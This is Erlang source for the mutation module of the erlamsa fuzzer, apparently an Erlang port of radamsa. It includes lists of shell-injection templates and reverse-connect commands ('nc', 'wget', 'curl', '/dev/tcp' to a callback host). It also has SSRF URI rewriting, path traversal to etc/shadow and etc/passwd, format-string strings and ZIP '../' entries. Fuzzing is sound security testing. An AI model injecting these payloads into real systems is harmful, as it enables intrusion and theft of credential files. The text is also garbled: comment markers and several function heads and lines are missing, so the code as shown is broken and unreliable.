lines(Bvec) -> lines(binary_to_list(Bvec), [], []).
lines([], [], Out) -> lists:reverse(Out);
lines([], Buff, Out) -> lists:reverse([lists:reverse(Buff)] ++ Out);
lines([10|T], Buff, Out) -> lines(T, [], [lists:reverse([10 | Buff]) | Out]);
lines([H|T], Buff, Out) -> lines(T, [H | Buff], Out).
-spec unlines([string()]) -> binary().
%% Lst -> bvec
unlines(Lst) ->
lists:foldl(fun (X, Acc) -> C = list_to_binary(X), <<Acc/binary, C/binary>> end, <<>>, Lst).
-spec try_lines(binary()) -> [string()] | false.
# u8[byte ... ] - > ( ( byte ... 10 ) ... ) | # false , if this does n't look like line - based text data
%% TODO: ugly code, need a bit refactor
try_lines(Bvec) ->
Ls = lines(Bvec),
IsBin = erlamsa_utils:binarish(Bvec),
if
Ls =:= [] -> false;
IsBin =:= true -> false;
true -> Ls
end.
-spec construct_line_muta(fun(), atom()) -> mutation_fun().
construct_line_muta(Op, Name) ->
fun Self(Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{Self, Ll, Meta, -1};
true ->
MLs = Op(Ls, length(Ls)), % calc length only once
NH = unlines(MLs),
{Self, [NH | T], [{Name, 1}|Meta], 1}
end
end.
-spec construct_st_line_muta(fun(), atom(), list()) -> mutation_fun().
%% state is (n <line> ...)
construct_st_line_muta(Op, Name, InitialState) ->
fun (Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{construct_st_line_muta(Op, Name, InitialState),
Ll, Meta, -1};
true ->
{Stp, NewLs} = Op(InitialState, Ls),
{construct_st_line_muta(Op, Name, Stp),
[unlines(NewLs) | T], [{Name, 1} | Meta], 1}
end
end.
%%
%% Shared sequences
%%
-spec sed_fuse_this(list_of_bins(), meta_list()) -> mutation_res().
%% (a b ...) -> (a+a b ...)
jump between two shared suffixes in the block
Lst = binary_to_list(H),
B = list_to_binary(erlamsa_fuse:fuse(Lst, Lst)),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_this/2, [B | T], [{fuse_this, D}|Meta], D}.
-spec sed_fuse_next(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_next([H|T], Meta) ->
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
{B, Ll} = erlamsa_utils:uncons(T, H), % next or current
Bl = binary_to_list(B),
Abl = erlamsa_fuse:fuse(Al1, Bl),
Abal = erlamsa_fuse:fuse(Abl, Al2),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_next/2,
< - on avg 1x , max 2x block sizes
[{fuse_next, D}|Meta], D}.
-spec remember(binary()) -> mutation_fun().
remember(Block) ->
fun ([H|T], Meta) ->
TODO : Check -- in radamsa here using owllisp halve instead of split
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
{Ol1, Ol2} = erlamsa_utils:halve(binary_to_list(Block)),
A = erlamsa_fuse:fuse(Al1, Ol1), % a -> o
B = erlamsa_fuse:fuse(Ol2, Al2), % o -> a
Swap = erlamsa_rnd:rand(3),
D = erlamsa_rnd:rand_delta(),
NewBlock = case Swap of
0 -> H;
_Else -> Block
end,
{remember(NewBlock),
< - on avg 1x , max 2x block sizes
erlamsa_utils:flush_bvecs(list_to_binary(B), T)),
[{fuse_old, D}|Meta], D}
end.
-spec sed_fuse_old(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_old(Ll = [H|_], Meta) ->
R = remember(H),
R(Ll, Meta).
%%
ASCII string mutations ( use UTF-8 later )
%%
%%% Text mutations
%% check that the nodes do look stringy enough to mutate with these
%% heuristics, meaning there are some nodes and/or just one, but it's
%% stringy
in radamsa this will stop if found byte node ; here , we continue
-spec stringy(list(byte())) -> false | true.
stringy([]) -> false;
stringy([{byte, _} | T]) -> false or stringy(T);
in radamsa -- length(Cs )
-spec silly_strings() -> list(string()).
added \r
["%n", "%n", "%s", "%d", "%p", "%#x", [0], "aaaa%d%n", [10], [13], [9], [8]].
-spec delimeters() -> list(string()).
delimeters() ->
["'", "\"", "'", "\"", "'", "\"", "&", ":", "|", ";",
"\\", [10], [13], [9], " ", "`", [0], "]", "[", ">", "<"].
-spec shellinjects() -> list(string()).
shellinjects() ->
[
"';~s;'", "\";~s;\"", ";~s;", "|~s#",
"^ ~s ^", "& ~s &", "&& ~s &&", "|| ~s ||",
"%0D~s%0D", "`~s`"
].
-spec revconnects() -> list(string()).
revconnects() ->
[
"calc.exe & notepad.exe ~s ~p ", "nc ~s ~p", "wget http://~s:~p", "curl ~s ~p",
"exec 3<>/dev/tcp/~s/~p", "sleep 100000 # ~s ~p ", "echo>/tmp/erlamsa.~s.~p"
].
-spec random_badness() -> list().
random_badness() ->
random_badness(erlamsa_rnd:rand(20) + 1, []).
-spec random_badness(non_neg_integer(), list()) -> list().
random_badness(0, Out) -> Out;
random_badness(N, Out) ->
X = erlamsa_rnd:rand_elem(silly_strings()),
random_badness(N - 1, X ++ Out).
-spec overwrite(list(), list()) -> list().
overwrite([], Old) -> Old;
overwrite([H|T], [_|OldT]) ->
[H | overwrite(T, OldT)];
overwrite([H|T], Old) ->
[H | overwrite(T, Old)].
-spec rand_as_count() -> non_neg_integer().
rand_as_count() ->
Type = erlamsa_rnd:rand(11),
case Type of
0 -> 127;
1 -> 128;
2 -> 255;
3 -> 256;
4 -> 16383;
5 -> 16384;
6 -> 32767;
7 -> 32768;
8 -> 65535;
9 -> 65536;
_Else -> erlamsa_rnd:rand(1024)
end.
-spec push_as(non_neg_integer(), list()) -> list().
push_as(0, Tail)
-> Tail;
push_as(N, Tail) ->
push_as(N - 1, [97 | Tail]).
-spec insert_traversal(char()) -> list().
insert_traversal(Symb) ->
[Symb | lists:flatten(lists:map(fun (_) -> [$., $., Symb] end, lists:seq(1, erlamsa_rnd:erand(10))))].
-spec mutate_text_data(string(), [text_mutators()]) -> string().
mutate_text_data(Lst, TxtMutators) ->
mutate_text(erlamsa_rnd:rand_elem(TxtMutators), Lst).
-spec buildrevconnect() -> string().
buildrevconnect() ->
Inj = erlamsa_rnd:rand_elem(shellinjects()),
Rev = erlamsa_rnd:rand_elem(revconnects()),
{IP, Port} = get_ssrf_ep(),
lists:flatten(io_lib:format(Inj, [io_lib:format(Rev, [IP, Port])])).
-spec mutate_text(text_mutators(), string()) -> string().
%% insert badness
mutate_text(insert_badness, []) -> random_badness(); %% empty list -- just insert random
mutate_text(insert_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
TODO : check before or after E , in radamsa Bad + + [ X ] ,
%% replace badness
mutate_text(replace_badness, []) -> random_badness(); %% empty list -- just replace with random
mutate_text(replace_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
lists:sublist(Lst, P - 1) ++ overwrite(lists:nthtail(P, Lst), Bad);
%% insert as
mutate_text(insert_aaas, []) -> push_as(rand_as_count(), []); %% empty list -- just insert random
mutate_text(insert_aaas, Lst) ->
N = rand_as_count(),
in erlang lists starts from 1
lists:sublist(Lst, P - 1) ++ push_as(N, lists:nthtail(P, Lst));
%% insert path traversal
mutate_text(insert_traversal, []) -> insert_traversal("/"); %% empty list -- just insert random
mutate_text(insert_traversal, Lst) ->
in erlang lists starts from 1
lists:sublist(Lst, P - 1)
++ insert_traversal(erlamsa_rnd:rand_elem(["\\", "/"]))
++ lists:nthtail(P, Lst);
%% insert null
mutate_text(insert_null, Lst) ->
Lst ++ [0];
insert
mutate_text(insert_delimeter, []) -> [erlamsa_rnd:rand_elem(delimeters())]; %% empty list -- just insert random
mutate_text(insert_delimeter, Lst) ->
in erlang lists starts from 1
Bad = erlamsa_rnd:rand_elem(delimeters()),
erlamsa_utils:applynth(P, Lst, fun(E, R) -> Bad ++ [E|R] end); %% TODO: check before or after E
mutate_text(insert_shellinj, []) -> [erlamsa_rnd:rand_elem(delimeters())]; %% empty list -- just insert random
mutate_text(insert_shellinj, Lst) ->
in erlang lists starts from 1
ShellInj = buildrevconnect(),
erlamsa_utils:applynth(P, Lst, fun(E, R) -> ShellInj ++ [E|R] end).
Generic ASCII Bad mutation
In Radamsa , this function will work only if Cs started as string
%% Else, if Cs contains only byte nodes, it will run infinetely
%% Here, we do maximum L/4 runs in this case
%% TODO: WARN: Ineffective, need rewrite/optimize
-spec string_generic_mutate(chunk_list(), [text_mutators()], non_neg_integer(), non_neg_integer()) -> chunk_list().
string_generic_mutate(Cs, _, L, R) when R > L/4 -> Cs;
string_generic_mutate(Cs, TxtMutators, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
{text, Bs} ->
Data = mutate_text_data(Bs, TxtMutators),
erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [{text, Data} | Rest] end); % [Node]
{byte, _Bs} ->
string_generic_mutate(Cs, TxtMutators, L, R + 1);
{delimited, Left, Bs, Right} ->
erlamsa_utils:applynth(P, Cs, fun (_E, Rest) -> [{delimited, Left, mutate_text_data(Bs, TxtMutators), Right}] ++ Rest end)
end.
-spec construct_ascii_mutator(fun(), atom()) -> mutation_fun().
construct_ascii_mutator(Fun, Name) ->
fun Ascii_mutator (Ll = [H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
in radamsa stringy_length
true -> % do something bad...
Ms = Fun(Cs),
D = erlamsa_rnd:rand_delta(),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{Ascii_mutator,
[BinData | T],
[{Name, D}|Meta], D};
not a string at all ( even 1 node ) , skipping
{Ascii_mutator, Ll, Meta, -1}
end
end.
-spec construct_ascii_bad_mutator() -> mutation_fun().
construct_ascii_bad_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_generic_mutate(Cs,
[insert_badness, replace_badness, insert_traversal, insert_aaas, insert_null],
length(Cs), 0)
end,
ascii_bad).
-spec drop_delimeter(non_neg_integer(), chunk()) -> chunk().
drop one(both ) or zero delimeters
drop_delimeter(0, {delimited, Left, Bs, _Right}) -> % drop right
{text, [Left|Bs]};
drop_delimeter(1, {delimited, _Left, Bs, Right}) -> % drop left
{text, Bs ++ [Right]} ;
drop_delimeter(2, {delimited, _Left, Bs, _Right}) -> % drop both
{text, Bs};
drop_delimeter(_, El) -> % drop none
El.
%% Play with delimeters
-spec string_delimeter_mutate(chunk_list(), non_neg_integer(), non_neg_integer()) -> chunk_list().
string_delimeter_mutate(Cs, L, R) when R > L/4 -> Cs;
string_delimeter_mutate(Cs, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
{text, Bs} -> %% insert or drop special delimeter(s)
Data = mutate_text_data(Bs, [erlamsa_rnd:rand_elem(
[
insert_delimeter, insert_delimeter,
insert_delimeter, insert_shellinj
])
]),
erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [{text, Data}|Rest] end); % [Node]
{byte, _Bs} -> %% do nothing
string_delimeter_mutate(Cs, L, R + 1);
{delimited, _Left, _Bs, _Right} ->
Drop = drop_delimeter(erlamsa_rnd:rand(4), El),
erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [Drop|Rest] end)
end.
-spec construct_ascii_delimeter_mutator() -> mutation_fun().
construct_ascii_delimeter_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_delimeter_mutate(Cs, length(Cs), 0)
end,
ascii_delimeter).
%%
%% Base64 Mutator
%%
-spec base64_mutator(list_of_bins(), meta_list()) -> mutation_res().
base64_mutator([H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
MutasList = mutas_list(erlamsa_mutations:mutations([])),
%io:format("~p ~n", [Cs]),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, Acc = {DAcc, MAcc}) when length(A) > 6 ->
try base64:decode(A) of
Bin ->
D = erlamsa_rnd:rand_delta(),
Muta = mutators_mutator(MutasList, []),
{_, NewLl, AddedMeta} = Muta([Bin], []),
NewBin = erlang:iolist_to_binary(NewLl),
{
{text, base64:encode_to_string(NewBin)},
{DAcc + D, [AddedMeta, {base64_mutator, D} | MAcc]}
}
catch
error:badarg ->
{{text, A}, Acc};
error:function_clause ->
{{text, A}, Acc};
_:_ ->
{{text, A}, Acc}
end;
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
%io:format("~p~n", [Ms]),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
%%
%% URI SSRF/Path traversal Mutator
%%
%% need this wrapper in case if ets process not started (erlamsa_app:start haven't called)
-spec get_ssrf_ep() -> {string(), integer()}.
get_ssrf_ep() ->
try get_ssrf_ep_unsafe() of
{SSRFHost, SSRFPort} -> {SSRFHost, SSRFPort}
catch
_:_ -> {"localhost", 51234}
end.
-spec get_ssrf_ep_unsafe() -> {string(), integer()}.
get_ssrf_ep_unsafe() ->
SSRFPort = case ets:match(global_config, {cm_port, '$1'}) of
[[Port]] -> Port;
_ -> 51234
end,
SSRFSystemHost = case ets:match(global_config, {cm_host, '$1'}) of
[[SHost]] -> SHost;
_ -> {}
end,
SSRFUserHost = case ets:match(global_config, {cm_host_user, '$1'}) of
[[UHost]] -> UHost;
_ -> {}
end,
SSRFHost = case {SSRFSystemHost, SSRFUserHost} of
{{}, {}} -> "localhost";
{SSRFSystemHost, {}} -> inet:ntoa(SSRFSystemHost);
{_, SSRFUserHost} -> SSRFUserHost;
_ -> "localhost"
end,
{SSRFHost, SSRFPort}.
-spec get_ssrf_uri() -> list().
get_ssrf_uri() ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
io_lib:format("://~s:~p/", [SSRFHost, SSRFPort]).
%% replace file with http
-spec change_scheme(list()) -> list().
change_scheme([$e, $l, $i, $f | T]) -> lists:reverse([$p, $t, $t, $h | T]);
change_scheme(Lst) -> lists:reverse(Lst).
-spec rand_uri_mutate(string(), string(), integer()) -> {string(), integer(), list()}.
rand_uri_mutate(T, Acc, 1) ->
{change_scheme(Acc) ++ get_ssrf_uri() ++ T, 1, {uri, success}};
rand_uri_mutate(T, Acc, 2) ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
AtAddr = lists:flatten(io_lib:format(erlamsa_rnd:rand_elem([" @~s:~p", "@~s:~p"]),
[SSRFHost, SSRFPort])
),
[Domain | Query] = string:tokens(T, "/"),
Modified = lists:flatten([change_scheme(Acc), "://", Domain, AtAddr, $/, string:join(Query,"/")]),
{Modified, 1, {uri, success}};
rand_uri_mutate(T, Acc, 3) ->
[Domain | Query] = string:tokens(T, "/"),
Traversals = ["/" | lists:map(fun (_) -> "../" end, lists:seq(1, erlamsa_rnd:erand(10)))],
NewQuery = Traversals ++ case erlamsa_rnd:erand(4) of
1 -> string:join(Query, "/");
2 -> "Windows/win.ini";
3 -> "etc/shadow";
4 -> "etc/passwd"
end,
{lists:reverse(Acc) ++ "://" ++ Domain ++ lists:flatten(NewQuery), 1, {uri, success}}.
-spec try_uri_mutate(list()) -> {list(), integer(), list()}.
try_uri_mutate(Lst) -> try_uri_mutate(Lst, []).
-spec try_uri_mutate(list(), list()) -> {list(), integer(), list()}.
try_uri_mutate([ $:, $/, $/ | T], Acc) ->
rand_uri_mutate(T, Acc, erlamsa_rnd:erand(3));
try_uri_mutate([], Acc) -> {lists:reverse(Acc), 0, []};
try_uri_mutate([H|T], Acc) ->
try_uri_mutate(T, [H|Acc]).
-spec uri_mutator(list_of_bins(), meta_list()) -> mutation_res().
uri_mutator([H|T], Meta) ->
Cs = erlamsa_strlex:lex(binary_to_list(H)),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, {DAcc, MAcc}) when length(A) > 5 ->
{NewA, NewD, NewMeta} = try_uri_mutate(A),
{{text, NewA}, {DAcc + NewD, [NewMeta | MAcc]}};
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
%%
%% Guessed Parse-tree Mutations
%%
-spec usual_delims(non_neg_integer()) -> non_neg_integer() | false.
%% ?? could be settable from command line
usual_delims(40) -> 41; % ()
usual_delims(91) -> 93; % []
usual_delims(60) -> 62; % <>
usual_delims(123) -> 125; % {}
usual_delims(34) -> 34; % ""
usual_delims(39) -> 39; % ''
usual_delims(_) -> false.
-spec grow(list(), byte(), list()) -> {list(), list() | false}.
- > lst # false = ran out of data trying to parse up to close , but lst is the same with partial parsing
- > lst tail - lst = did successfully parse up to close . ready node is lst , tail is following data
grow([], _Close, Rout) -> %% out of data, didn't find close. return partial parse.
{lists:reverse(Rout), false};
grow([H|T], Close, Rout) when H =:= Close -> %% match complete, return with rest of list
{lists:reverse([Close | Rout]), T};
grow([H|T], Close, Rout) ->
Next_close = usual_delims(H),
case Next_close of
add one byte to this node
grow(T, Close, [H | Rout]);
_Else ->
{This, Lst} = grow(T, Next_close, []),
if %% we didn't run out of data and this is a single tree node
Lst =:= false ->
{lists:reverse(Rout) ++ [H | This], false};
%% we ran out of data. this is a list of partial parses (having the data of
%% lst after hd in some form) which we want to preserve as tail
true ->
grow(Lst, Close, [[H | This] | Rout])
end
end.
% -spec count_nodes(list()) -> non_neg_integer().
% %% count how many list nodes are in a tree structure
% count_nodes(Lst) -> count_nodes(Lst, 0).
% -spec count_nodes(list(), non_neg_integer()) -> non_neg_integer().
% count_nodes([], N) -> N;
% count_nodes([H|T], N) when is_list(H) ->
count_nodes(T , count_nodes(H , N+1 ) ) ;
% count_nodes([_|T], N) ->
% count_nodes(T, N).
-spec sublists(list()) -> list().
lst - > a list of lists ( not counting tails ) in lst , when walked recursively , not counting lst itself
sublists(Lst) -> sublists(Lst, []).
-spec sublists(list(), list()) -> list().
sublists([], Found) -> Found;
sublists([H|T], Found) when is_list(H) ->
sublists(T, sublists(H, [H|Found]));
sublists([_H|T], Found) ->
sublists(T, Found).
-spec pick_sublist(list()) -> list().
pick_sublist(Lst) ->
Subs = sublists(Lst),
case Subs of
[] -> false;
_Else ->
erlamsa_rnd:rand_elem(Subs)
end.
%% TODO: type for fun().
-spec edit_sublist(list(), list(), fun()) -> list().
edit_sublist(Lst, Sub, Op) ->
lists:reverse(edit_sublist(Lst, Sub, Op, [])).
%% replace the node (sub . tail) with (op (sub . tail))
-spec edit_sublist(list(), list(), fun(), list()) -> list().
edit_sublist(Lst = [H|_T], Sub, Op, Acc) when H =:= Sub ->
[Op(Lst)|Acc];
edit_sublist([H|T], Sub, Op, Acc) ->
NewH = edit_sublist(H, Sub, Op),
edit_sublist(T, Sub, Op, [NewH|Acc]);
edit_sublist(Lst, _Sub, _Op, Acc) ->
[Lst|Acc].
%% TODO: type for fun().
-spec edit_sublists(list(), gb_trees:tree()) -> list().
lst ( ff of node - > ( node - > node ) ) - > lst ' ; < - could also be done with a recursive - mapn
edit_sublists([Hd|T], OpFF) when is_list(Hd) ->
MaybeOp = erlamsa_utils:get(Hd, false, OpFF),
case MaybeOp of
false ->
[edit_sublists(Hd, OpFF) | edit_sublists(T, OpFF)];
_ ->
[MaybeOp(Hd) | edit_sublists(T, OpFF)]
end;
edit_sublists([H|T], OpFF) ->
[H | edit_sublists(T, OpFF)];
edit_sublists(Lst, _) -> Lst.
-spec partial_parse(list()) -> list().
partial_parse(Lst) -> partial_parse(Lst, []).
-spec partial_parse(list(), list()) -> list().
partial_parse([], Rout) ->
lists:reverse(Rout);
partial_parse([H|T], Rout) ->
CloseP = usual_delims(H),
case CloseP of
false ->
partial_parse(T, [H | Rout]);
_ ->
{This, Lst} = grow(T, CloseP, []),
case Lst of
false ->
lists:reverse(Rout) ++ [H|This];
_ ->
partial_parse(Lst, [[H|This] | Rout])
end
end.
% -spec flatten(list(), list()) -> list().
% flatten([], Tl) ->
% Tl;
% flatten([H|T], Tl) ->
% flatten(H, flatten(T, Tl));
% flatten(Node, Tl) ->
% [Node | Tl].
%% TODO: type for fun().
-spec sed_tree_op(fun(), atom()) -> mutation_fun().
sed_tree_op(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
NewMeta = [{Name, 1} | Meta],
Lst = partial_parse(binary_to_list(H)),
Sub = pick_sublist(Lst), %% choose partially parsed node to mutate ;; fixme: not checked for F
NewLst = edit_sublist(Lst, Sub, Op),
{F, [erlang:iolist_to_binary(NewLst) | T], NewMeta, 1}
end
end.
-spec sed_tree_dup() -> mutation_fun().
sed_tree_dup() ->
sed_tree_op(fun (Node = [H|_T]) -> [H|Node] end, tree_dup).
-spec sed_tree_del() -> mutation_fun().
sed_tree_del() ->
sed_tree_op(fun ([_H|T]) -> T end, tree_del).
-spec sed_tree_swap_one(list(), list()) -> list().
overwrite one node with one of the others
sed_tree_swap_one(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = erlamsa_rnd:random_permutation(ToSwap),
edit_sublist(Lst, A, fun ([_|Tl]) -> [B | Tl] end).
-spec sed_tree_swap_two(list(), list()) -> list().
pairwise swap of two nodes
TODO : here there is a bug ( also in original radamsa ) that causes to swap child with the parent node , could be feature xD
sed_tree_swap_two(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = ToSwap,
Mapping = gb_trees:enter(B, fun(_X) -> A end, gb_trees:enter(A, fun (_X) -> B end, gb_trees:empty())),
edit_sublists(Lst, Mapping).
%% TODO: type for fun().
-spec construct_sed_tree_swap(fun(), atom()) -> mutation_fun().
construct_sed_tree_swap(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
Lst = partial_parse(binary_to_list(H)),
Subs = sublists(Lst),
N = length(Subs),
case N < 2 of
true -> {F, Ll, Meta, -1};
false ->
NewLst = Op(Lst, Subs),
{F, [erlang:iolist_to_binary(NewLst) | T], [{Name, 1} | Meta], 1}
end
end
end.
%% tree stutter
-spec repeat_path(list(), list(), non_neg_integer()) -> list().
repeat_path(Parent, _Child, N) when N < 2 ->
< - causes at least 1 extra path to be made , saves one useless replace cycle
repeat_path(Parent, Child, N) ->
%% preventing too deep lists
case erlang:process_info(self(), memory) of
{memory, Mem} when Mem > 256000000 ->
Parent;
_Else ->
edit_sublist(Parent, Child,
fun ([_H|T]) -> [repeat_path(Parent, Child, N-1) | T] end)
end.
-spec choose_child(list()) -> false | list().
choose_child(Node) ->
Subs = sublists(Node),
case Subs of
[] -> false;
_Else -> erlamsa_rnd:rand_elem(Subs)
end.
-spec choose_stutr_nodes(list()) -> {false | list(), false | list()}.
choose_stutr_nodes([]) -> {false, false}; %% no child nodes
choose_stutr_nodes([H|T]) ->
Childp = choose_child(H),
case Childp of
false -> choose_stutr_nodes(T);
_Else -> {H, Childp}
end.
-spec sed_tree_stutter(list_of_bins(), meta_list()) -> mutation_res().
sed_tree_stutter(Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {fun sed_tree_stutter/2, Ll, Meta, -1};
false ->
Lst = partial_parse(binary_to_list(H)), %% (byte|node ...)
Subs = sublists(Lst),
RandSubs = erlamsa_rnd:random_permutation(Subs),
{Parent, Child} = choose_stutr_nodes(RandSubs),
N_reps = erlamsa_rnd:rand_log(10),
case Parent of
false -> {fun sed_tree_stutter/2, Ll, Meta, -1};
_Else ->
NewLst = edit_sublist(Lst, Child,
fun ([_H|Tl]) -> [repeat_path(Parent, Child, N_reps)|Tl] end),
{fun sed_tree_stutter/2,
[erlang:iolist_to_binary(NewLst) | T],
[{tree_stutter, 1} | Meta], 1}
end
end.
%%
UTF-8
%%
grab low 6 bits of a number
-spec ext(integer()) -> integer().
ext(N) ->
(N band 2#111111) bor 2#10000000.
-spec encode_point(integer()) -> [integer()].
encode an ascii to utf-8
ascii , fits 7 bits
[Point];
5 + 6 bits
[16#c0 bor (16#1f band (Point bsr 6)),
ext(Point)];
4 + 2 * 6 bits
[16#e0 bor (16#0f band (Point bsr 12)),
ext(Point bsr 6),
ext(Point)];
3 + 3 * 6 bits
[16#f0 bor (2#111 band (Point bsr 18)),
ext(Point bsr 12),
ext(Point bsr 6),
ext(Point)].
-spec funny_unicode() -> list().
%% TODO: VERY INEFFECTIVE, should be constant...
funny_unicode() ->
65535
65536
[16#ef, 16#bb, 16#bf], % the canonical utf8 bom
[16#fe, 16#ff], % utf16 be bom
utf16
[0, 0, 16#ff, 16#ff], % ascii null be
[16#ff, 16#ff, 0, 0], % ascii null le
[43, 47, 118, 56], % and some others from wikipedia
[43,47,118,57],[43,47,118,43],[43,47,118,47],
[247,100,76],[221,115,102,115],[14,254,255],[251,238,40],
[251,238,40,255],[132,49,149,51]],
Codes = [[16#0009,16#000d],16#008D, 16#00a0,16#1680,16#180e,
[16#2000,16#200a],16#2028,16#2029,16#202f,16#205f,
16#3000,[16#200e,16#200f],[16#202a,16#202e],
[16#200c,16#200d],16#0345,16#00b7,[16#02d0,16#02d1],
16#ff70,[16#02b0,16#02b8],16#fdd0,16#034f,
[16#115f,16#1160],[16#2065,16#2069],16#3164,16#ffa0,
16#e0001,[16#e0020,16#e007f],
[16#0e40,16#0e44],16#1f4a9],
Numbers = lists:foldl(
fun
([X,Y], Acc) -> lists:seq(X,Y) ++ Acc;
(X, Acc) -> [X|Acc]
end, [], Codes),
Manual ++ [encode_point(X) || X <- Numbers].
-spec sed_utf8_widen(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_widen([H|T], Meta) ->
P = erlamsa_rnd:rand(size(H)),
D = erlamsa_rnd:rand_delta(),
{fun sed_utf8_widen/2,
[edit_byte_vector(H, P,
fun (B) when B =:= B band 2#111111 -> N = B bor 2#10000000, <<2#11000000:8, N:8>>;
(B) -> <<B:8>>
end)
| T], [{sed_utf8_widen, D}|Meta], D}.
-spec sed_utf8_insert(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_insert([H|T], Meta) ->
P = erlamsa_rnd:rand(size(H)),
D = erlamsa_rnd:rand_delta(),
Bin = list_to_binary(erlamsa_rnd:rand_elem(funny_unicode())),
{fun sed_utf8_insert/2,
[edit_byte_vector(H, P,
fun (B) -> <<B:8, Bin/binary>> end)
| T], [{sed_utf8_insert, D}|Meta], D}.
%% Null debug mutator -- passes data "as is" -- for testing
-spec nomutation(list_of_bins(), meta_list()) -> mutation_res().
nomutation(Ll, Meta) ->
{fun nomutation/2, Ll, [{nomutation, -1}|Meta], -1}.
%%
%% Length predict mutations -- trying to mutate len
%%
%% TODO: correct spec
%%-spec mutate_length(binary()) -> {integer(), binary()}.
mutate_length(Binary, []) -> {-2, Binary};
mutate_length(Binary, _Elem = {ok, Size, Endianness, Len, A, _B}) ->
Am8 = A * 8, Len8 = Len * 8,
{H, Len, Blob, Rest} = erlamsa_field_predict:extract_blob(Endianness, Binary, Am8, Size, Len8),
<<TmpNewLen:Size>> = erlamsa_rnd:random_block(trunc(Size/8)),
NewLen = min(?ABSMAX_BINARY_BLOCK, TmpNewLen*2),
Result =
case erlamsa_rnd:rand(7) of
%% set len field = 0
0 -> <<H:Am8, 0:Size, Blob:Len8, Rest/binary>>;
set len field = 0xFF .. FF
1 -> <<H:Am8, -1:Size, Blob:Len8, Rest/binary>>;
%% expand blob field with random data
2 ->
RndBlock = erlamsa_rnd:fast_pseudorandom_block(NewLen),
TmpBin = erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, Len, Size, Blob, Len8, RndBlock),
<<TmpBin/binary, Rest/binary>>;
%% drop blob field
3 ->
erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, 0, 0, Rest);
%% set len field = random bytes(..)
_Else ->
erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, Blob, Len8, Rest)
end,
{+1, Result}.
-spec length_predict(list_of_bins(), meta_list()) -> mutation_res().
length_predict([H|T], Meta) ->
Elem = erlamsa_rnd:rand_elem(erlamsa_field_predict:get_possible_simple_lens(H)),
{D, Bin} = mutate_length(H, Elem),
{fun length_predict/2, [Bin|T], [{muta_len, D}|Meta], D}.
%%
%% ZIP Path traversal
%%
mutate_zip_path(FileName, I, B, Acc) ->
R = erlamsa_rnd:rand(20),
NewFileName = lists:flatten([ "../" || _A <- lists:seq(1,R)] ++ FileName),
[{NewFileName, B(), I()} | Acc].
-spec zip_path_traversal(list_of_bins(), meta_list()) -> mutation_res().
zip_path_traversal([H|T], Meta) ->
Name = "inmemory.zip",
case zip:foldl(fun mutate_zip_path/4, [], {Name, H}) of
{ok, FileSpec} ->
{ok, {Name, Bin}} = zip:create(Name, lists:reverse(FileSpec), [memory]),
{fun zip_path_traversal/2, [Bin|T], [{muta_zippath, +1}|Meta], +1};
_Else ->
{fun zip_path_traversal/2, [H|T], [{muta_zippath, -1}|Meta], -1}
end.
%%
Basic type mutations ( for fuzzing record - related ( e.g. protobuf , ASN.1 , etc ) data
%%
-spec basic_mutate_binary(binary()) -> binary().
basic_mutate_binary(Binary) ->
Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations(default)),
{_NewMuta, NewLstBin, _Meta} = Muta([Binary], []),
hd(NewLstBin).
-spec basic_mutate_list(list()) -> list().
basic_mutate_list(Lst) -> basic_mutate_list(Lst, erlamsa_rnd:rand(12)).
-spec basic_mutate_list(list(), 0..12) -> list().
basic_mutate_list(_Lst, 0) -> []; %% replace with empty
basic_mutate_list(Lst, 1) -> Lst ++ Lst; %% dup a list
basic_mutate_list(Lst, 2) -> %% permute a list
erlamsa_rnd:random_permutation(Lst);
basic_mutate_list(Lst, 3) -> %% delete an element
erlamsa_generic:list_del(Lst, length(Lst));
basic_mutate_list(Lst, 4) -> %% delete an element
erlamsa_generic:list_del_seq(Lst, length(Lst));
swap two elements
erlamsa_generic:list_dup(Lst, length(Lst));
